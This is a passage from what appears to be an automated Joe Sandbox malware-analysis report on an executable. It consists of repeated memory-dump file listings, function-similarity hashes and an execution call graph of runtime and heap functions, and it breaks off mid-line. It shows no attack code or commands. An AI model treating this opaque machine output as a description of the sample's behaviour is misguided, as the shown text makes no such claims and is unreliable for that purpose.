                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_e70000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _strrchr
                                                                                                                                                                                                                                                  • String ID: v
                                                                                                                                                                                                                                                  • API String ID: 3213747228-1361604894
                                                                                                                                                                                                                                                  • Opcode ID: e735d7118d15e2b04af68ee7be9476ee50b6c15cebd4be360e770f4c3f107c3f
                                                                                                                                                                                                                                                  • Instruction ID: d6869f64b0091971d7ea790749ad6a8d5497a36bd410fcc680214e92ed74c0e4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e735d7118d15e2b04af68ee7be9476ee50b6c15cebd4be360e770f4c3f107c3f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 49B10432A046459FDB15CF28C8817FEBBE5EF4A354F24916AD855FF241D634AD01CBA0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_e70000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 531285432-0
                                                                                                                                                                                                                                                  • Opcode ID: 288e06b9e9e898109e5fbe51983b63111469c5c766fdda24fd38f2584396c21d
                                                                                                                                                                                                                                                  • Instruction ID: e3eeba2734bae90a898cbf7fac7ee133a76cdb3548d597e648c271a3560414a3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 288e06b9e9e898109e5fbe51983b63111469c5c766fdda24fd38f2584396c21d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB212C71A00119AFDF00EFA4DC81DBEB7B9EF49714F201029FA09B7261DB309D019BA0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_e70000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ___free_lconv_mon
                                                                                                                                                                                                                                                  • String ID: 8"$`'
                                                                                                                                                                                                                                                  • API String ID: 3903695350-1436819768
                                                                                                                                                                                                                                                  • Opcode ID: d7c110d9a3d807f8e3461e988f94df22a25153ba822446f4996ff84bcee1a553
                                                                                                                                                                                                                                                  • Instruction ID: ba76e885b870b5926cb2815894645fd954667d3c0babe5ef794a9993d78f4e0f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d7c110d9a3d807f8e3461e988f94df22a25153ba822446f4996ff84bcee1a553
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E1316931600301DFEB20ABB9D945B5B77E8EF0A31EF14683AE095EE591DF30B884CA11

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:1%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                                  Total number of Nodes:1956
                                                                                                                                                                                                                                                  Total number of Limit Nodes:9
                                                                                                                                                                                                                                                  execution_graph 9919 473c47 9920 473c51 9919->9920 9923 473c5f 9920->9923 9935 4732d0 9920->9935 9921 473c68 9923->9921 9954 473810 9923->9954 9958 48c6ac 9935->9958 9937 47336b 9964 48c26a 9937->9964 9939 47333c __Mtx_unlock 9941 48c26a 5 API calls 9939->9941 9942 473350 std::invalid_argument::invalid_argument 9939->9942 9943 473377 9941->9943 9942->9923 9945 48c6ac GetSystemTimePreciseAsFileTime 9943->9945 9944 473314 9944->9937 9944->9939 9961 48bd4c 9944->9961 9946 4733af 9945->9946 9947 48c26a 5 API calls 9946->9947 9948 4733b6 __Cnd_broadcast 9946->9948 9947->9948 9949 48c26a 5 API calls 9948->9949 9950 4733d7 __Mtx_unlock 9948->9950 9949->9950 9951 48c26a 5 API calls 9950->9951 9952 4733eb 9950->9952 9953 47340e 9951->9953 9952->9923 9953->9923 9955 47381c 9954->9955 10126 472440 9955->10126 9968 48c452 9958->9968 9960 48c6b9 9960->9944 9985 48bb72 9961->9985 9963 48bd5c 9963->9944 9965 48c292 9964->9965 9966 48c274 9964->9966 9965->9965 9966->9965 9991 48c297 9966->9991 9969 48c4a8 9968->9969 9971 48c47a std::invalid_argument::invalid_argument 9968->9971 9969->9971 9974 48cf6b 9969->9974 9971->9960 9972 48c4fd __Xtime_diff_to_millis2 9972->9971 9973 48cf6b _xtime_get GetSystemTimePreciseAsFileTime 9972->9973 9973->9972 9975 48cf7a 9974->9975 9977 48cf87 __aulldvrm 9974->9977 9975->9977 9978 48cf44 9975->9978 9977->9972 9981 48cbea 9978->9981 9982 48cbfb GetSystemTimePreciseAsFileTime 9981->9982 9983 48cc07 9981->9983 9982->9983 9983->9977 9986 48bb9c 9985->9986 9987 48cf6b _xtime_get GetSystemTimePreciseAsFileTime 9986->9987 9990 48bba4 __Xtime_diff_to_millis2 std::invalid_argument::invalid_argument 9986->9990 9988 48bbcf __Xtime_diff_to_millis2 9987->9988 9989 48cf6b _xtime_get GetSystemTimePreciseAsFileTime 9988->9989 9988->9990 9989->9990 9990->9963 9996 472ae0 9991->9996 9993 48c2ae 10003 48c1ff 9993->10003 9995 48c2bf std::_Throw_future_error 10011 48bedf 9996->10011 9998 472af4 __dosmaperr 9998->9993 10014 4aa671 9998->10014 10004 48c20b __EH_prolog3_GS 10003->10004 10005 4880c0 RtlAllocateHeap 10004->10005 10006 48c23d 10005->10006 10065 4726b0 10006->10065 10008 48c252 10082 487970 10008->10082 10010 48c25a 10010->9995 10034 48cc31 10011->10034 10015 4aa67b __dosmaperr 10014->10015 10016 4ad82f __dosmaperr RtlAllocateHeap 10015->10016 10017 4aa694 10015->10017 10019 4aa6bc __dosmaperr 10016->10019 10018 4a6ccc 10017->10018 10022 4a8bec __cftof 4 API calls 10017->10022 10028 4a8bec 10018->10028 10020 4aa6fc 10019->10020 10021 4aa6c4 __dosmaperr 10019->10021 10023 4aa49f __dosmaperr RtlAllocateHeap 10020->10023 10024 4aadf5 ___free_lconv_mon RtlAllocateHeap 10021->10024 10025 4aa72d 10022->10025 10026 4aa707 10023->10026 10024->10017 10027 4aadf5 ___free_lconv_mon RtlAllocateHeap 10026->10027 10027->10017 10029 4a8bf1 __cftof 10028->10029 10033 4a8bfc ___std_exception_copy 10029->10033 10038 4ad634 10029->10038 10059 4a65ed 10033->10059 10035 48cc3f InitOnceExecuteOnce 10034->10035 10037 48bef2 10034->10037 10035->10037 10037->9998 10039 4ad640 __dosmaperr 10038->10039 10040 4aa7c8 __dosmaperr RtlAllocateHeap 10039->10040 10046 4ad667 __cftof 10039->10046 10047 4ad66d __cftof __dosmaperr 10039->10047 10040->10046 10041 4ad6b2 10042 4a75f6 __dosmaperr RtlAllocateHeap 10041->10042 10044 4ad6b7 10042->10044 10043 4ad69c 10043->10033 10045 4a6c5a ___std_exception_copy RtlAllocateHeap 10044->10045 10045->10043 10046->10041 10046->10043 10046->10047 10048 4ad81b __dosmaperr 10047->10048 10049 4ad726 10047->10049 10051 4ad751 __cftof 10047->10051 10050 4a65ed __cftof 3 API calls 10048->10050 10049->10051 10062 4ad62b 10049->10062 10053 4ad82e 10050->10053 10051->10043 10054 4aa671 __cftof 4 API calls 10051->10054 10056 4ad7a5 10051->10056 10054->10056 10056->10043 10058 4aa671 __cftof 4 API calls 10056->10058 10057 4ad62b __cftof 4 API calls 10057->10051 10058->10043 10060 4a64c7 __cftof 3 API calls 10059->10060 10061 4a65fe 10060->10061 10063 4aa671 __cftof 4 API calls 10062->10063 10064 4ad630 10063->10064 10064->10057 10087 487a00 10065->10087 10067 472702 10068 472725 10067->10068 10101 488f40 10067->10101 10070 488f40 RtlAllocateHeap 10068->10070 10071 47278e 10068->10071 10070->10071 10072 4727ed shared_ptr 10071->10072 10074 4728b8 10071->10074 10073 4a38af ___std_exception_copy RtlAllocateHeap 10072->10073 10077 47284b 10073->10077 10075 4a6c6a RtlAllocateHeap 10074->10075 10075->10077 10076 47287a shared_ptr std::invalid_argument::invalid_argument 10076->10008 10077->10076 10078 4a6c6a RtlAllocateHeap 10077->10078 10079 4728c2 10078->10079 10122 4a3912 10079->10122 10081 4728e5 shared_ptr 10081->10008 10083 48797b 10082->10083 10084 487996 shared_ptr 10082->10084 10083->10084 10085 4a6c6a RtlAllocateHeap 10083->10085 10084->10010 10086 4879ba 10085->10086 10088 487a26 10087->10088 10089 487a2d 10088->10089 10090 487a81 10088->10090 10091 487a62 10088->10091 10089->10067 10096 48d3e2 RtlAllocateHeap 10090->10096 10098 487a76 __cftof 10090->10098 10092 487ab9 10091->10092 10093 487a69 10091->10093 10094 472480 RtlAllocateHeap 10092->10094 10095 48d3e2 RtlAllocateHeap 10093->10095 10097 487a6f 10094->10097 10095->10097 10096->10098 10097->10098 10099 4a6c6a RtlAllocateHeap 10097->10099 10098->10067 10100 487ac3 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ __Cnd_unregister_at_thread_exit 10099->10100 10100->10067 10102 488f6b 10101->10102 10103 48908e 10101->10103 10107 488fdc 10102->10107 10108 488fb2 10102->10108 10104 489270 RtlAllocateHeap 10103->10104 10105 489093 10104->10105 10106 472480 RtlAllocateHeap 10105->10106 10114 488fc3 __cftof 10106->10114 10110 48d3e2 RtlAllocateHeap 10107->10110 10107->10114 10108->10105 10109 488fbd 10108->10109 10112 48d3e2 RtlAllocateHeap 10109->10112 10110->10114 10111 4a6c6a RtlAllocateHeap 10113 48909d 10111->10113 10112->10114 10115 4890b8 10113->10115 10117 4890be 10113->10117 10118 472480 std::_Throw_future_error 10113->10118 10114->10111 10119 48904c shared_ptr __cftof 10114->10119 10116 48d3e2 RtlAllocateHeap 10115->10116 10116->10117 10117->10068 10120 4a38af ___std_exception_copy RtlAllocateHeap 10118->10120 10119->10068 10121 4724c3 10120->10121 10121->10068 10123 4a391f 10122->10123 10124 4a3926 10122->10124 10125 4a8ba3 ___std_exception_copy RtlAllocateHeap 10123->10125 10124->10081 10125->10124 10129 48b5d6 10126->10129 10128 472472 10131 48b5f1 std::_Throw_future_error 10129->10131 10130 4a8bec __cftof 4 API calls 10132 48b69f 10130->10132 10131->10130 10133 48b658 __cftof std::invalid_argument::invalid_argument 10131->10133 10133->10128 10134 471a40 10135 4880c0 RtlAllocateHeap 10134->10135 10136 471a51 10135->10136 10139 48d64e 10136->10139 10142 48d621 10139->10142 10143 48d630 10142->10143 10144 48d637 10142->10144 10148 4a988e 10143->10148 10151 4a98fa 10144->10151 10147 471a5b 10149 4a98fa RtlAllocateHeap 10148->10149 10150 4a98a0 10149->10150 10150->10147 10154 4a9630 10151->10154 10153 4a992b 10153->10147 10155 4a963c __dosmaperr 10154->10155 10158 4a968b 10155->10158 10157 4a9657 10157->10153 10159 4a96a7 10158->10159 10160 4a971e __dosmaperr 10158->10160 10159->10160 10167 4a96fe 10159->10167 10168 4aedf6 10159->10168 10160->10157 10162 4aedf6 RtlAllocateHeap 10164 4a9714 10162->10164 10163 4a96f4 10165 4aadf5 ___free_lconv_mon RtlAllocateHeap 10163->10165 10166 4aadf5 ___free_lconv_mon RtlAllocateHeap 10164->10166 10165->10167 10166->10160 10167->10160 10167->10162 10169 4aee1e 10168->10169 10170 4aee03 10168->10170 10172 4aee2d 10169->10172 10177 4b4fdc 10169->10177 10170->10169 10171 4aee0f 10170->10171 10173 4a75f6 __dosmaperr RtlAllocateHeap 10171->10173 10184 4b500f 10172->10184 10176 4aee14 __cftof 10173->10176 10176->10163 10178 4b4ffc 10177->10178 10179 4b4fe7 10177->10179 10178->10172 10180 4a75f6 __dosmaperr RtlAllocateHeap 10179->10180 10181 4b4fec 10180->10181 10182 4a6c5a ___std_exception_copy RtlAllocateHeap 10181->10182 10183 4b4ff7 10182->10183 10183->10172 10185 4b501c 10184->10185 10186 4b5027 10184->10186 10193 4ab04b 10185->10193 10188 4b502f 10186->10188 10191 4b5038 __dosmaperr 10186->10191 10189 4aadf5 ___free_lconv_mon RtlAllocateHeap 10188->10189 10192 4b5024 10189->10192 10190 4a75f6 __dosmaperr RtlAllocateHeap 10190->10192 10191->10190 10191->10192 10192->10176 10195 4ab059 __dosmaperr 10193->10195 10194 4a75f6 __dosmaperr RtlAllocateHeap 10196 4ab087 10194->10196 10195->10194 10195->10196 10196->10192 10212 473440 10217 472b30 10212->10217 10214 47344f std::_Throw_future_error 10215 4a38af ___std_exception_copy RtlAllocateHeap 10214->10215 10216 473483 10215->10216 10218 4a38af ___std_exception_copy RtlAllocateHeap 10217->10218 10219 472b68 std::invalid_argument::invalid_argument 10218->10219 10219->10214 10225 473840 10226 4738f6 10225->10226 10229 47385f 10225->10229 10227 473920 10267 4891e0 10227->10267 10229->10226 10229->10227 10230 4738cd shared_ptr 10229->10230 10233 47391b 10229->10233 10235 487d50 10230->10235 10231 473925 10234 4a6c6a RtlAllocateHeap 10233->10234 10234->10227 10236 487dcb 10235->10236 10237 487d62 10235->10237 10238 472480 RtlAllocateHeap 10236->10238 10239 487d9c 10237->10239 10240 487d6d 10237->10240 10241 487d7a 10238->10241 10243 487db9 10239->10243 10246 48d3e2 RtlAllocateHeap 10239->10246 10240->10236 10242 487d74 10240->10242 10244 4a6c6a RtlAllocateHeap 10241->10244 10248 487d83 10241->10248 10245 48d3e2 RtlAllocateHeap 10242->10245 10243->10226 10253 487dd5 10244->10253 10245->10241 10247 487da6 10246->10247 10247->10226 10248->10226 10249 487f20 10250 489270 RtlAllocateHeap 10249->10250 10263 487e91 __cftof 10250->10263 10251 487e01 10251->10226 10252 487f1b 10257 472480 RtlAllocateHeap 10252->10257 10253->10249 10253->10251 10253->10252 10255 487e80 10253->10255 10256 487ea7 10253->10256 10254 4a6c6a 